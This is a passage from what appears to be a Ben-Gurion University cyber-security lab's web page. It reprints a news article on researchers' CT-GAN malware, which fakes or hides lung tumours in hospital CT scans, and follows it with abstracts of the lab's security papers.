Even after the radiologists were told that the scans had been altered by malware and were given a second set of 20 scans, half of which were modified, they still were tricked into believing the scans with fake nodules were real 60 percent of the time, leading them to misdiagnoses involving those patients. In the case of scans where the malware removed cancerous nodules, doctors did not detect this 87 percent of the time, concluding that very sick patients were healthy.

The researchers ran their test against a lung-cancer screening software tool that radiologists often use to confirm their diagnoses and were able to trick it into misdiagnosing the scans with false tumors every time.

“I was quite shocked,” said Nancy Boniel, a radiologist in Canada who participated in the study. “I felt like the carpet was pulled out from under me, and I was left without the tools necessary to move forward.”

The study focused on lung cancer scans only. But the attack would work for brain tumors, heart disease, blood clots, spinal injuries, bone fractures, ligament injuries and arthritis, Mirsky said.

Attackers could choose to modify random scans to create chaos and mistrust in hospital equipment, or they could target specific patients, searching for scans tagged with a specific patient’s name or ID number. In doing this, they could prevent patients who have a disease from receiving critical care or cause others who aren’t ill to receive unwarranted biopsies, tests and treatment. The attackers could even alter follow-up scans after treatment begins to falsely show tumors spreading or shrinking. Or they could alter scans for patients in drug and medical research trials to sabotage the results.

The vulnerabilities that would allow someone to alter scans reside in the equipment and networks hospitals use to transmit and store CT and MRI images. These images are sent to radiology workstations and back-end databases through what’s known as a picture archiving and communication system (PACS). Mirsky said the attack works because hospitals don’t digitally sign the scans to prevent them from being altered without detection and don’t use encryption on their PACS networks, allowing an intruder on the network to see the scans and alter them.

“They’re very, very careful about privacy … if data is being shared with other hospitals or other doctors,” Mirsky said, “because there are very strict rules about privacy and medical records. But what happens within the [hospital] system itself, which no regular person should have access to in general, they tend to be pretty lenient [about]. It’s not … that they don’t care. It’s just that their priorities are set elsewhere.”

Although one hospital network they examined in Israel did try to use encryption on its PACS network, the hospital configured the encryption incorrectly and as a result the images were still not encrypted.

Fotios Chantzis, a principal information-security engineer with the Mayo Clinic in Minnesota who did not participate in the study but confirmed that the attack is possible, said that PACS networks are generally not encrypted. That’s in part because many hospitals still operate under the assumption that what’s on their internal network is inaccessible from outside — even though “the era where the local hospital network was a safe, walled garden is long gone,” he said.

Although encryption is available for some PACS software now, it’s still generally not used for compatibility reasons. It has to communicate with older systems that don’t have the ability to decrypt or re-encrypt images.

To develop their malware, the Israeli researchers used machine learning to train their code to rapidly assess scans passing through a PACS network and to adjust and scale fabricated tumors to conform to a patient’s unique anatomy and dimensions to make them more realistic. The entire attack can be fully automated so that once the malware is installed on a hospital’s PACS network, it will operate independently of the researchers to find and alter scans, even searching for a specific patient’s name.

To get the malware onto a PACS network, attackers would need either physical access to the network — to connect a malicious device directly to the network cables — or they could plant malware remotely from the Internet. The researchers found that many PACS networks are either directly connected to the Internet or accessible through hospital machines that are connected to the Internet.

To see how easy it would be to physically install malware on a PACS network, Mirsky conducted a test at a hospital in Israel that the researchers videotaped. He was able to enter the radiology department after hours and connect his malicious device to the network in just 30 seconds, without anyone questioning his presence. Although the hospital had given permission for the test, staff members didn’t know how or when Mirsky planned to carry it out.

To prevent someone from altering CT and MRI scans, Mirsky says, ideally hospitals would enable end-to-end encryption across their PACS network and digitally sign all images while also making sure that radiology and doctor workstations are set up to verify those signatures and flag any images that aren’t properly signed.

Suzanne Schwartz, a medical doctor and the Food and Drug Administration’s associate director for Science and Strategic Partnerships, who has been leading some of the FDA’s effort to secure medical devices and equipment, expressed concern about the findings of the Israeli researchers. But she said many hospitals don’t have the money to invest in more secure equipment, or they have 20-year-old infrastructure that doesn’t support newer technologies.

“It’s going to require changes that go well beyond devices, but changes with regards to the network infrastructure,” Schwartz said. “This is where engaging and involving with other authorities and trying to bring the entire community together becomes really important.”

Christian Dameff, an emergency room physician with the University of California at San Diego School of Medicine and a security researcher who has exposed vulnerabilities with the 911 emergency calling system,notes that in the case of a cancer diagnosis, some backstops would prevent a patient from receiving unwarranted treatment based only on a maliciously modified CT scan. But that doesn’t mean the attack would be harmless.

“There are a couple of steps before we just take someone to surgery” or prescribe radiation and chemotherapy, Dameff said. “But there is still harm to the patient regardless. There is the emotional distress [from learning you may have cancer], and there are all sorts of insurance implications.”

The radiologists in the BGU study recommended follow-up treatment and referrals to a specialist for all of the patients with scans that showed cancerous lung nodules. They recommended immediate tissue biopsies or other surgery for at least a third of them.

Correction: This story has been updated to reflect that the hospital in Israel didn’t encrypt any data passed over its network. An earlier version of the story said it had encrypted the metadata for the scans, which contains a patient’s name and medical ID.

Source: The Washington Post

About Us

Cyber@BGU is an umbrella organization at Ben Gurion University, being home to various cyber security, big data analytics and AI applied research activities.Residing in newly established R&D center at the new Hi-Tech park of Beer Sheva (Israel’s Cyber Capital), Cyber@BGU serves as a platform for the most innovative and technologically challenging projects with various industrial and governmental partners.

Latest Publications

Deployment Optimization of IoT Devices through Attack Graph Analysis

Noga Agmon, Asaf Shabtai, Rami Puzis

Department of Software and Information Systems Engineering, Ben-Gurion University of the Negev, 11 Apr 2019

Deployment Optimization of IoT Devices through Attack Graph Analysis

Noga Agmon, Asaf Shabtai, Rami Puzis

Department of Software and Information Systems Engineering, Ben-Gurion University of the Negev, 11 Apr 2019

The Internet of things (IoT) has become an integral part of our life
at both work and home. However, these IoT devices are prone to vulnerability exploits due to their low cost, low resources, the diversity
of vendors, and proprietary firmware. Moreover, short range communication protocols (e.g., Bluetooth or ZigBee) open additional
opportunities for the lateral movement of an attacker within an organization. Thus, the type and location of IoT devices may significantly
change the level of network security of the organizational network.
In this paper, we quantify the level of network security based on
an augmented attack graph analysis that accounts for the physical
location of IoT devices and their communication capabilities. We
use the depth-first branch and bound (DFBnB) heuristic search algorithm to solve two optimization problems: Full Deployment with
Minimal Risk (FDMR) and Maximal Utility without Risk Deterioration (MURD). An admissible heuristic is proposed to accelerate the
search. The proposed method is evaluated using a real network with
simulated deployment of IoT devices. The results demonstrate (1)
the contribution of the augmented attack graphs to quantifying the
impact of IoT devices deployed within the organization on security,
and (2) the effectiveness of the optimized IoT deployment.

Link

CT-GAN: Malicious Tampering of 3D Medical Imagery using Deep Learning

Yisroel Mirsky, Tom Mahler, Ilan Shelef, Yuval Elovici

Department of Information Systems Engineering, Ben-Gurion University, Israel Soroka University Medical Center. 3 Apr 2019

CT-GAN: Malicious Tampering of 3D Medical Imagery using Deep Learning

Yisroel Mirsky, Tom Mahler, Ilan Shelef, Yuval Elovici

Department of Information Systems Engineering, Ben-Gurion University, Israel Soroka University Medical Center. 3 Apr 2019

In 2018, clinics and hospitals were hit with numerous attacks
leading to significant data breaches and interruptions in
medical services. An attacker with access to medical records
can do much more than hold the data for ransom or sell it on
the black market.
In this paper, we show how an attacker can use deeplearning to add or remove evidence of medical conditions
from volumetric (3D) medical scans. An attacker may perform
this act in order to stop a political candidate, sabotage research,
commit insurance fraud, perform an act of terrorism, or
even commit murder. We implement the attack using a 3D
conditional GAN and show how the framework (CT-GAN)
can be automated. Although the body is complex and 3D
medical scans are very large, CT-GAN achieves realistic
results which can be executed in milliseconds.
To evaluate the attack, we focused on injecting and
removing lung cancer from CT scans. We show how three
expert radiologists and a state-of-the-art deep learning AI are
highly susceptible to the attack. We also explore the attack
surface of a modern radiology network and demonstrate one
attack vector: we intercepted and manipulated CT scans in an
active hospital network with a covert penetration test.

Link

Analysis of Location Data Leakage in the Internet Traffic of Android-based Mobile Devices

Nir Sivan, Ron Bitton, Asaf Shabtai

Department of Software and Information Systems Engineering Ben-Gurion University of the Negev. 12 Dec 2018

Analysis of Location Data Leakage in the Internet Traffic of Android-based Mobile Devices

Nir Sivan, Ron Bitton, Asaf Shabtai

Department of Software and Information Systems Engineering Ben-Gurion University of the Negev. 12 Dec 2018

In recent years we have witnessed a shift towards personalized, context-based applications and services for mobile device users. A key component of many of these services is the ability to infer the current location and predict the future location of users based on location sensors embedded in the devices. Such knowledge enables service providers to present relevant and timely offers to their users and better manage traffic congestion control, thus increasing customer satisfaction and engagement. However, such services suffer from location data leakage which has become one of today’s most concerning privacy issues for smartphone users.

BGU researchers focused specifically on location data that is exposed by Android applications via Internet network traffic in plaintext (i.e., without encryption) without the user’s awareness. An empirical evaluation, involving the network traffic of real mobile device users, aimed at: (1) measuring the extent of location data leakage in the Internet traffic of Android-based smartphone devices; and (2) understanding the value of this data by inferring users’ points of interests (POIs).

The key findings of this research center on the extent of this phenomenon in terms of both ubiquity and severity.

Link

Incentivized Delivery Network of IoT Software Updates Based on Trustless Proof-of-Distribution

Oded Leiba, Yechiav Yitzchak, Ron Bitton, Asaf Nadler, Asaf Shabtai

IEEE SECURITY & PRIVACY ON THE BLOCKCHAIN (IEEE S&B) AN IEEE EUROPEAN SYMPOSIUM ON SECURITY & PRIVACY AFFILIATED WORKSHOP 23 April 2018, University College London (UCL), London, UK

Incentivized Delivery Network of IoT Software Updates Based on Trustless Proof-of-Distribution

Oded Leiba, Yechiav Yitzchak, Ron Bitton, Asaf Nadler, Asaf Shabtai

IEEE SECURITY & PRIVACY ON THE BLOCKCHAIN (IEEE S&B) AN IEEE EUROPEAN SYMPOSIUM ON SECURITY & PRIVACY AFFILIATED WORKSHOP 23 April 2018, University College London (UCL), London, UK

The Internet of Things (IoT) network of connected devices currently contains more than 11 billion devices and is estimated to double in size within the next four years. The prevalence of these devices makes them an ideal target for attackers. To reduce the risk of attacks vendors routinely deliver security updates (patches) for their devices. The delivery of security updates becomes challenging due to the issue of scalability as the number of devices may grow much quicker than vendors’ distribution systems. Previous studies have suggested a permissionless and decentralized blockchainbased network in which nodes can host and deliver security updates, thus the addition of new nodes scales out the network. However, these studies do not provide an incentive for nodes to join the network, making it unlikely for nodes to freely contribute their hosting space, bandwidth, and computation resources.
In this paper, we propose a novel decentralized IoT software update delivery network in which participating nodes (referred to as distributors) are compensated by vendors with digital currency for delivering updates to devices. Upon the release of a new security update, a vendor will make a commitment to provide digital currency to distributors that deliver the update; the commitment will be made with the use of smart contracts, and hence will be public, binding, and irreversible. The smart contract promises compensation to any distributor that provides proof-of-distribution, which is unforgeable proof that a single update was delivered to a single device. A distributor acquires the proof-of-distribution by exchanging a security update for a device signature using the Zero-Knowledge Contingent Payment (ZKCP) trustless data exchange protocol. Eliminating the need for trust between the security update distributor and the security consumer (IoT device) by providing fair compensation, can significantly increase the number of distributors, thus facilitating rapid scale out.

Link

Photo Gallery